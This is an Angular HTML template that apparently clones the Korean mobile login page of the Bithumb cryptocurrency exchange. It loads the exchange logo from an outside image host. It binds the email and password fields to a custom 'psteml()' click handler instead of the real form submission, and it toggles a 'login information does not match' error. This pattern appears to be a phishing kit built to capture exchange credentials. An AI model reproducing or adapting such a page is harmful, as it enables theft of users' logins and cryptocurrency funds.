<ngx-spinner bdColor = "rgba(0,0,0,0.64)" size = "medium" color = "#fff" type = "line-scale" [fullScreen] = "true"></ngx-spinner>
<header id="header">
   <div id="smartBanner">
      <div class="nav-fixed-search" id="navFixedSearch">
         <div class="form-group form-group--reset form-group--search-nav-fixed inp_search">
            <div class="form-group__box form-group__box--icon-left inp_search"><input type="text" class="form-group__control form-group__control--no-border __nav-fixed-search-input" id="txtSearch" data-language="main.msg.01" placeholder="코인명 또는 심볼 검색"><button type="button" class="button-form-reset g_hidden"><i class="sp-mobile-head ico_reset"></i></button><span class="form-group__icon form-group__icon--search"><i class="sp-mobile-head"></i></span></div>
         </div>
         <button type="button" class="nav-fixed-search__button" id="navFixedSearchClose"><span class="nav-fixed-search__button-text" data-language="page.common.msg07">취소</span></button>
      </div>
      <nav class="nav-fixed">
         <div class="nav-fixed-box--left" id="navFixedSearch"><a href="" class="nav-fixed__prev-button" id="headHref">
            <img height="30px" src="https://i.ibb.co/17gdq6b/Bithumb-logo.png">
         
         </a></div>
         <div class="nav-fixed-box--center">
            <h3 class="nav-fixed__title">로그인</h3>
         </div>
         <div class="nav-fixed-box--right"></div>
      </nav>
   </div>
</header>

<div class="content">
   <form action="https://m.bithumb.com/member_operation/loginsuccess" id="frmLogin" name="frmLogin" method="post" accept-charset="utf-8">
      <div class="row">
         <div class="col s12 input-field s10" id="wrapUserID">
            
            <input [(ngModel)]='user.em' #pre="ngModel" required name="em" type="email" class="validate" id="userId" maxlength="50" data-scanning="inputId"><label for="userId" data-language="page.p101.msg02" class="">이메일 주소</label></div>
      </div>
      <div class="row">
         <div class="col s12 input-field s10" id="wrapUserPW">
            
            <input [(ngModel)]='user.ps' #pre="ngModel" required name="ps" type="password" class="validate" id="userPw" maxlength="64" data-scanning="inputPw" autocomplete="off"><label for="userPw" data-language="common.msg08">비밀번호</label></div>


         <div class="col s5 input-field right-align hide" id="wrapSMS"><span class="btn btn-flat waves-effect" id="btnSMS" data-scanning="btnSMS" data-language="common.head.msg117">인증번호요청</span></div>
         <div class="sms_time hide"></div>
      </div>
   </form>
   <div class="wrongpass" [style.display]="flag2 ? color2 : color3" >로그인 정보가 일치하지 않습니다.</div>

   <div class="row">
      <div (click)="psteml()" class="btn_orange btn-large col s12 center-align waves-effect" id="btnLogin" data-scanning="btnLogin" data-language="common.msg295">

         <span [style.display]="flag1 ? color3 : color2" >  <i class="fas fa-spinner fa-spin"></i></span>
         <span [style.display]="flag1 ? color2 : color3" class="waves-effect">로그인</span>         
      
      </div>
   </div>




   <div class="row loginbtn_wrap"><a href="/member_operation/join" class="text_underline center-align GA_LOGIN_JOIN_BTN" data-language="page.p101.msg03">신규 회원 가입</a><strong class="text_cen">l</strong><a href="/member_operation/find_password" class="text_underline center-align" data-language="page.u1.msg588">비밀번호 찾기</a></div>
   <ul class="notice list">
      <li data-language="page.u1.msg04">일반가입 계정과 간편가입 계정은 별도의 계정으로, 잔고 및 회원 정보를 공유하지 않습니다.</li>
      <li data-language="page.p101.msg06">OTP인증사용 고객님들은 로그인 시 OTP 이중인증이 적용됩니다.</li>
   </ul>
</div>










<ul class="bottomMenu">
   <li class=""><a href="/" data-language="common.head.msg22" class="GA_PUBLIC_BOTTOM_MENU_HOME"><i class="sp-mobile-head trade"></i>거래소</a></li>
   <li class="">
      <a href="/additional_service/lending_kind" data-language="common.head.msg23" class="GA_PUBLIC_BOTTOM_MENU_LENDING">
         <div class="ico_container"><i class="icoNew icoNewMenu">N</i></div>
         <i class="sp-mobile-head lending"></i>렌딩
      </a>
   </li>
   <li class=""><a href="/asset_status/asset_my" data-language="common.head.msg23" class="GA_PUBLIC_BOTTOM_MENU_ASSET"><i class="sp-mobile-head asset"></i>자산현황</a></li>
   <li class=""><a href="/trade/statement" data-language="page.common.msg583" class="GA_PUBLIC_BOTTOM_MENU_DEPOSIT"><i class="sp-mobile-head depositNWithdraw"></i>입출금</a></li>
   <li class=""><a href="/main/more_index" data-language="page.common.msg777" class=""><i class="sp-mobile-head more-menu"></i>더보기</a></li>
</ul>
